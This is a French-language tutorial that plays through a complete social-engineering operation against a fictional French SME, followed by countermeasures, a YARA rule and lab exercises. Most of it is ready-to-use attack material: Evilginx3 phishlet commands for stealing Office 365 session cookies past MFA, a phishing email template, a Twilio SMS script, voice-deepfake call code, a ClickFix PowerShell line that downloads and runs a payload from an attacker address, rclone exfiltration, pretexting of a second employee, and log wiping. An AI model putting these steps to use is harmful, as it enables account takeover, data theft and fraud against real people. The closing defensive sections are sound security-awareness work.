Scénario réaliste inspiré des méthodes de Kevin Mitnick : OSINT, spear‑phishing, deepfake vocal & backdoor psychologique
Outils Kali à jour, techniques 2026, et contre‑mesures pour cyberdéfenseurs
Kevin Mitnick ne cassait pas des algorithmes, il cassait des personnes. Dans les années 90, il a prouvé que le maillon le plus faible de la sécurité, c'est l'humain. En 2026, ses techniques n'ont pas pris une ride – elles ont juste changé de support. L'IA générative et les deepfakes ont décuplé la puissance de l'ingénierie sociale, rendant les attaques plus crédibles que jamais.
Ce tutoriel vous plonge dans la peau d'un attaquant en ingénierie sociale qui utilise Kali Linux pour mener une opération complète, de la reconnaissance à l'exfiltration de données sensibles, sans écrire une seule ligne de code malveillant. La cible : une PME française spécialisée dans les marchés publics. L'objectif : voler des appels d'offres confidentiels.
Mitnick passait des jours à fouiller les poubelles et à écouter les conversations. Aujourd'hui, on utilise Kali et des outils automatisés, mais la psychologie reste la même.
Avec theHarvester et Maigret, on récupère les emails, comptes et centres d'intérêt liés à DefenseTech.
# theHarvester : moissonnage d'emails et de domaines
theHarvester -d defensetech.fr -b linkedin,google,bing -l 200
# Maigret : recherche de comptes sur 3000+ sites
maigret m.l@defensetech.fr --pdf
On identifie Marc L. et son adresse : m.l@defensetech.fr. On note aussi le fournisseur cloud : Office 365. Maigret nous donne son pseudo "MarcRS" sur le forum PassionRS.
On lance Maltego (communauté) pour visualiser les relations. On découvre que Marc est membre d'un club de propriétaires de Porsche. On note le nom du forum "PassionRS" et son pseudo "MarcRS".
On utilise l'outil holehe et l'API d'Epieos pour vérifier si le mail de Marc est présent sur des sites tiers.
# holehe : savoir si l'email est inscrit sur des services
holehe m.l@defensetech.fr --only-used
# Epieos (interface web ou API) pour rechercher des comptes
curl -X POST https://api.epieos.com/search -d "email=m.l@defensetech.fr"
Résultat : compte actif sur LinkedIn, Twitter (obsolète), et surtout sur le forum "PassionRS". Bingo.
On consulte des bases de données de fuites (téléchargées légalement dans le lab, ex. "Have I Been Pwned" offline). On trouve que le mot de passe de Marc sur un ancien forum (compromis) était "Porsche911!".
On note ce mot de passe. Il pourrait être réutilisé ailleurs.
Avec toutes ces infos, on peut construire une histoire solide. On sait que Marc a une Porsche, qu'il utilise le forum PassionRS, et qu'il travaille chez DefenseTech. On va créer un piège sur mesure en utilisant plusieurs canaux pour maximiser l'impact.
En 2026, une seule tentative ne suffit plus. Les attaquants professionnels combinent plusieurs vecteurs pour submerger la cible et renforcer la crédibilité.
Au lieu de cloner un simple formulaire, on utilise Evilginx3, un framework de reverse proxy qui capture les tokens de session et contourne l'authentification multi‑facteurs. On l'installe sur notre serveur Ubuntu.
# Installation d'Evilginx3
git clone https://github.com/kgretzky/evilginx3.git
cd evilginx3
make
sudo ./evilginx -p phishlets/
# Configuration d'un phishlet pour Office 365
config domain defensetech.phishing.com
config ip 192.168.1.100
phishlet load office365
phishlet office365 enable
phishlet office365 set redirect_url https://www.defensetech.fr
lures create office365
lures get-url 0
On obtient une URL de phishing (ex. https://defensetech.phishing.com/login) qui affiche la vraie page de Microsoft et capture les cookies après connexion.
On utilise GoPhish pour envoyer des emails personnalisés et suivre les clics. On configure un profil SMTP avec un service relais légitime (Mailgun, SendGrid) pour éviter les filtres anti‑spam.
# Installation de GoPhish
wget https://github.com/gophish/gophish/releases/download/v0.12.0/gophish-v0.12.0-linux-64bit.zip
unzip gophish*.zip
sudo ./gophish
# Interface web : créer un groupe "Marc", un template d'email (concours Porsche), et lancer la campagne.
Le template d'email (généré par IA) :
Objet : 🏆 Concours privé PassionRS : gagnez un stage de pilotage sur le circuit du Mans !
Bonjour MarcRS,
En exclusivité pour les membres actifs, PassionRS organise un tirage au sort pour un stage de pilotage au volant d'une 911 GT3. Pour valider votre participation, connectez-vous à votre espace membre avant vendredi.
👉 [LIEN DE CONNEXION] (redirige vers le site Evilginx3)
L'équipe PassionRS
Quelques heures après l'email, on envoie un SMS avec un lien raccourci (via une passerelle SMS anonyme) pour rappeler l'urgence.
# Envoi de SMS via Twilio (script Python)
from twilio.rest import Client
client = Client(account_sid, auth_token)
client.messages.create(body="Marc, dernier rappel pour le concours Porsche ! Clique ici : https://defensetech.phishing.com/login", from_="+33612345678", to="+33698765432")
Marc n'a pas cliqué ? On passe à l'appel. On utilise ElevenLabs (ou XTTS‑v2 en local) pour cloner la voix du responsable du forum. Grâce à une interface Python + Twilio Media Streams, on peut interagir en temps réel.
# Script Python avec Twilio Media Streams + ElevenLabs WebSocket
# (Schéma : l'appel est connecté à un websocket qui génère l'audio à la volée)
from twilio.twiml.voice_response import VoiceResponse, Start
response = VoiceResponse()
start = Start()
start.stream(url='wss://notre-serveur-websocket/stream')
response.append(start)
response.say("Allô Marc, c'est Julien du forum PassionRS...")
print(response)
# Sur le serveur WebSocket : réception du texte, appel ElevenLabs, envoi audio
Si Marc répond, le système peut même analyser ses réponses avec un LLM pour adapter la conversation (agentic AI).
Si les autres vecteurs échouent, on utilise une méthode encore plus vicieuse : le ClickFix. Aucun lien à cliquer – l'utilisateur est invité à copier-coller une commande PowerShell.
Flux typique :
Pourquoi c'est dur à bloquer :
# Commande que l'utilisateur copie-colle dans PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-WebRequest -Uri http://192.168.1.100/payload.ps1 -OutFile $env:TEMP\update.ps1; & $env:TEMP\update.ps1"
Dans notre lab, on peut simuler une page HTML qui affiche cette instruction et logge les visiteurs.
Si l'email ne passe pas, on peut générer des QR codes malveillants et les coller dans des lieux publics (cafétéria, parking).
# Générateur de QR code
qrencode -o qr.png "https://defensetech.phishing.com/login"
Marc clique enfin, entre ses identifiants et son code MFA. Evilginx3 capture le cookie de session. On peut maintenant nous connecter à Office 365 sans avoir besoin du mot de passe ni de la MFA.
# Récupération du cookie dans les logs d'Evilginx3
cat ~/.evilginx/logs/sessions.log | grep "cookies"
Mitnick une fois entré ne laissait pas de programme, mais il s'assurait de pouvoir revenir. Ici, on va créer une "backdoor humaine" : on va placer un employé de l'entreprise en position de nous faire confiance.
Avec le cookie de session, on se connecte à Office 365 via le navigateur. On explore la boîte mail de Marc, on trouve des informations sur les appels d'offres et les collaborateurs.
On utilise rclone pour exfiltrer les fichiers OneDrive/SharePoint de manière discrète. Il faut configurer rclone avec un refresh token (pas de mot de passe).
# Utilisation de rclone pour exfiltrer les fichiers OneDrive/SharePoint
rclone config (créer un remote avec le token)
rclone ls remote:Documents
rclone copy remote:Documents ./exfil
Pour pouvoir revenir sans refaire tout le cirque, on va créer une relation de confiance avec un employé. On repère dans l'Active Directory un autre utilisateur, "Sophie D.", assistante de direction. On va lui envoyer un message Teams (via le compte de Marc) en disant qu'on a un problème urgent et qu'elle doit nous envoyer un fichier "test" sur un partage contrôlé par nous.
# En PowerShell (via le compte de Marc)
Send-Message -Recipient "sophie.d@defensetech.fr" -Body "Salut Sophie, peux-tu déposer le fichier test.xlsx sur le partage temporaire \\192.168.1.100\public ? Merci !"
Le partage est sur notre Kali. Sophie dépose un fichier contenant des infos sensibles (ex. une liste de mots de passe). On a maintenant une backdoor : on peut à tout moment recontacter Sophie en imitant Marc.
On peut aller plus loin : avec un deepfake vidéo (outils comme HeyGen ou DeepFaceLive), on peut apparaître en visio avec le visage et la voix de Marc pour demander un virement urgent ou un reset de mot de passe à Sophie. C'est l'attaque la plus redoutée en 2026.
On efface les logs de connexion (si possible) et on supprime les messages envoyés depuis la boîte de Marc.
# Connexion OWA (Outlook Web Access) et suppression des messages envoyés
| Technique | Coût | Difficulté de détection | Taux de succès estimé 2026 | Exemple |
|---|---|---|---|---|
| Deepfake vocal interactif (agentic AI) | Moyen | Très difficile | Très élevé (si pas de code out-of-band) | Appel se faisant passer pour le DG avec conversation dynamique |
| Deepfake vidéo en direct | Élevé | Extrêmement difficile | Élevé | Visio Teams avec le visage du DG |
| Evilginx3 / reverse proxy | Faible | Difficile (contourne MFA sauf FIDO2) | Moyen (dépend de l'absence de FIDO2) | Phishing avec capture de cookie |
| Multi‑channel (email+SMS+appel) | Moyen | Moyen | Élevé | Pression sur plusieurs canaux en 24h |
| ClickFix / LAPSUS$ style | Faible | Moyen (émergent) | Élevé | Fausse mise à jour navigateur avec copie de commande |
| QRishing (QR codes) | Très faible | Moyen | Moyen | QR code sur une affiche |
| Compromission de chaîne d'approvisionnement | Élevé | Difficile | Variable | Backdoor dans un logiciel tiers |
| BEC + deepfake | Moyen | Difficile | Élevé | Email du DG + appel de confirmation |
| Spear-phishing IA génératif | Faible | Difficile (style parfait) | +54% vs humain | Email ultra-personnalisé généré par LLM |
| Agentic AI conversationnel | Moyen | Très difficile | Très élevé | Bot autonome qui mène la conversation sur plusieurs tours |
Simulations de phishing régulières, ateliers sur les deepfakes, sensibilisation à l'OSINT. Inclure des tests de deepfake vocal.
Clés physiques FIDO2 (YubiKey) – les seules à résister à Evilginx3. Les passkeys sont l'avenir.
Pour toute demande inhabituelle (même par téléphone), rappeler sur un numéro connu ou utiliser un code à usage unique envoyé par canal différent.
Outils comme Pindrop Pulse (analyse acoustique + comportement d'appel), Reality Defender (multimodal), Modulate, ou méthodes open source (Whisper + analyse spectrogramme).
Remplacer les VPN par un accès contexte (identité, appareil, localisation).
Détecter les connexions anormales (heure, lieu, volume de données) et les comportements ClickFix.
Solutions comme Abnormal Security, Darktrace, Proofpoint qui détectent les messages générés par LLM.
Isoler les clics sur liens externes dans un environnement distant.
Désactiver l'AutoRun, analyser les clés USB.
Passer en mode rejet pour les domaines critiques.
Surveiller les processus PowerShell avec des arguments suspects (ScriptBlock Logging, AMSI).
rule Phishing_PassionRS {
meta:
description = "Détecte les emails frauduleux liés au forum PassionRS"
author = "PCTAMALOU 2026"
strings:
$subject1 = "Concours privé PassionRS" nocase
$subject2 = "stage de pilotage" nocase
$link = "defensetech.phishing.com" nocase
$body_urgent = "urgence" nocase
$body_immediat = "immédiat" nocase
condition:
any of ($subject*) or $link or (2 of ($body_*))
}
# Vérifier les en‑têtes DMARC d'un email
swaks --to m.l@defensetech.fr --from contact@passionrs.fr --header-X-Test "test"
# Surveiller les connexions VPN inhabituelles (logs)
grep "VPN login" /var/log/auth.log | awk '{print $1,$2,$3,$10}' | sort | uniq -c
# Activer le ScriptBlock Logging PowerShell
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
# Détecter les programmes eBPF (rootkit éventuel)
sudo bpftool prog list
Choisissez une entreprise fictive et utilisez theHarvester, Maigret, Epieos pour récolter des informations. Générez un rapport.
Installez Evilginx3 sur Kali, configurez un phishlet pour Office 365 (en local) et testez la capture de cookie avec un compte test. Vérifiez que les clés FIDO2 résistent.
Utilisez l'API ElevenLabs (crédits offerts) ou XTTS‑v2 en local pour cloner une voix. Générez une phrase et testez le réalisme.
En binôme, réalisez une attaque complète : email (GoPhish) + SMS (Twilio) + appel (deepfake) pour soutirer un mot de passe fictif.
Créez une page HTML qui affiche un faux message d'erreur (ex. "Mise à jour Zoom nécessaire") et invite à copier une commande PowerShell inoffensive (ex. Write-Host "ClickFix simulation"). Utilisez un script pour logger les visiteurs.
Générez un QR code menant à un site de phishing (fictif) et placez‑le dans un espace public. Mesurez le taux de clics (avec autorisation).
Configurez une clé YubiKey pour un compte Office 365 et testez la résistance à Evilginx3 – c'est LA démonstration qui marque les esprits.
Cette mission vous a montré que la technique la plus sophistiquée ne vaut rien face à un employé bien préparé... ou mal préparé. Kevin Mitnick l'avait compris : le véritable firewall, c'est l'humain. En 2026, avec l'IA générative et les deepfakes, cette vulnérabilité est plus grande que jamais.